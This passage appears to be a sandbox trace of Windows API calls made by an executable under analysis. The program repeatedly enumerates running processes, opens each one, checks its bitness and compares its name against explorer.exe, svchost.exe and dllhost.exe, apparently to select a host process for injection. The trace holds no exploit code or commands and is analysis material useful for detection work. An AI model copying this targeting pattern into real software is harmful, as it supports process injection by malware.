th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0187.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0187.694] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0187.694] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0187.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0187.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0187.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0187.696] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.696] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.696] CloseHandle (hObject=0xec) returned 1 [0187.696] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0187.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0187.696] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.697] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.697] CloseHandle (hObject=0xec) returned 1 [0187.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0187.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0187.698] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.698] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.698] CloseHandle (hObject=0xec) returned 1 [0187.698] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0187.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0187.698] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.698] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.698] CloseHandle (hObject=0xec) returned 1 [0187.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0187.699] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.699] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.699] CloseHandle (hObject=0xec) returned 1 [0187.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0187.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0187.700] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.700] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.700] CloseHandle (hObject=0xec) returned 1 [0187.700] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0187.700] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0187.700] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0187.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0187.701] CloseHandle (hObject=0xe8) returned 1 [0187.701] Sleep (dwMilliseconds=0x3e8) [0188.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0188.755] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0188.755] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0188.756] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0188.756] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0188.757] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0188.757] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0188.758] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0188.758] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0188.759] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0188.759] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0188.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0188.760] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0188.760] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0188.761] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0188.761] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0188.762] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0188.762] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0188.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0188.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0188.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0188.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0188.764] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.764] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.764] CloseHandle (hObject=0xec) returned 1 [0188.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0188.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0188.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0188.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0188.765] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.765] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.765] CloseHandle (hObject=0xec) returned 1 [0188.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0188.766] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0188.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0188.767] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0188.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0188.767] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.767] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.767] CloseHandle (hObject=0xec) returned 1 [0188.767] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0188.767] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0188.767] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0188.767] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0188.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0188.768] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.768] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.768] CloseHandle (hObject=0xec) returned 1 [0188.768] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0188.768] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0188.768] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0188.768] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0188.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0188.769] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.769] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.769] CloseHandle (hObject=0xec) returned 1 [0188.769] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0188.769] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0188.769] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0188.769] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0188.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0188.769] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.769] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.769] CloseHandle (hObject=0xec) returned 1 [0188.769] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0188.769] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0188.769] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0188.769] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0188.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0188.770] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.770] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.770] CloseHandle (hObject=0xec) returned 1 [0188.770] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0188.770] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0188.770] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0188.770] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0188.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0188.771] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.771] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.771] CloseHandle (hObject=0xec) returned 1 [0188.771] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0188.771] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0188.771] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0188.771] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0188.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0188.771] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.771] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.771] CloseHandle (hObject=0xec) returned 1 [0188.772] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0188.772] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0188.772] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0188.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0188.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0188.772] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.772] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.772] CloseHandle (hObject=0xec) returned 1 [0188.772] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0188.772] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0188.772] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0188.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0188.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0188.773] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.773] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.773] CloseHandle (hObject=0xec) returned 1 [0188.773] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0188.773] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0188.773] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0188.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0188.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0188.774] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.774] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.774] CloseHandle (hObject=0xec) returned 1 [0188.774] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0188.774] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0188.774] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0188.774] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, 